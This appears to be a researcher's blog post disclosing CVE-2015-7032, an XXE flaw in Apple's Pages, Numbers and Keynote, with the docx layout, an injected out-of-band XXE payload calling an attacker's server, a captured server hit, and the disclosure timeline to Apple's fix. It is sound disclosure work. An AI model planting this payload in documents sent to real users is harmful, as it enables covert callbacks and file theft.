Apple Pages, Numbers, Keynote Input Validation and XXE (CVE-2015-7032)


In June of 2015, Patrik Fehrenbach and I were able to identify a series of vulnerabilities in a few of Apple’s productivity applications: Pages, Numbers, as well as Keynote available for OS X and iOS 8.x (or older). In short, the application failed to validate the input while parsing a document.

While looking at these three applications, they all have on thing in common: They are made of different xml files once they have been unpacked. Lets start with Apple Pages.

Pages 5.6

Archive:  xxe.docx
  inflating: [Content_Types].xml     
   creating: _rels/
  inflating: _rels/.rels             
   creating: docProps/
  inflating: docProps/app.xml        
  inflating: docProps/core.xml       
  inflating: docProps/thumbnail.jpeg  
   creating: word/
   creating: word/_rels/
  inflating: word/_rels/document.xml.rels  
  inflating: word/document.xml       
  inflating: word/fontTable.xml      
  inflating: word/settings.xml       
  inflating: word/styles.xml         
  inflating: word/stylesWithEffects.xml  
   creating: word/theme/
  inflating: word/theme/theme1.xml   
  inflating: word/webSettings.xml

Each xml file shown in the list above has a part in the makings of the docx document. But the most important files that got our attention were

docProps/app.xml        
docProps/core.xml    
word/document.xml  

From my understanding the app.xml file stores app version used and company information. The core.xml file contains the info about the system such as the user who created the file, the date, time, and etc. The document.xml file contains the data inserted inside the document. Now inserting an XXE payload into any of those (or all just for fun) will force Apple Pages to crash however, the XML is still getting parsed. For this example we’ll use the following payload:

 
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE r [<!ELEMENT r ANY >
<!ENTITY % sp SYSTEM "IP:PORT/somefile.xml"
%sp;%param1;]>

and we can now save the file, and pack it again. If the file is opened with MS Word we’ll get told that the file is corrupted and the same thing would happen with Apple Pages, but in the background we’ll get this hit on our server:

SomeIP - - [24/Jun/2015 03:09:41] "GET /somefile.xml HTTP/1.1" 200 -

So what is exactly happening?

 

This is also exploitable on iOS 8.x by sending the file to an iPhone or an iPad when the file is processed by Pages.
Now that we have successfully exploited this on Apple pages, Are the other 2 exploitable as well?

Numbers and Keynote

The same method demonstrated for Apple Pages applies to the Apple Numbers and Keynote.

docProps/app.xml        
docProps/core.xml 

Injecting the same payload into the above mentioned files, will result into the same behavior. However this is also exploitable if it is opened on an iPhone or iPad (iOs 8).

Timeline:

7/23/2015 – Apple Pages’ Vulnerability report sent
7/23/2015 – Automated reply from Apple
8/25/2015 – Requested an updated – No answer
9/14/2015 – Requested another update –
9/14/2015 – Apple acknowledged the vulnerability + Patch to be released soon
9/15/215 – Apple Keynote’s Vulnerability report sent
9/16/2015 – Automated reply from Apple
9/17/215 – Apple Number’s Vulnerability report sent
9/18/2015 – Automated reply from Apple
9/25/2015 – Requested Update – Still working
10/4/2015 – Issue resolved by Apple
10/15/2015- CVE Assigned

Post a comment

You may use the following HTML:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>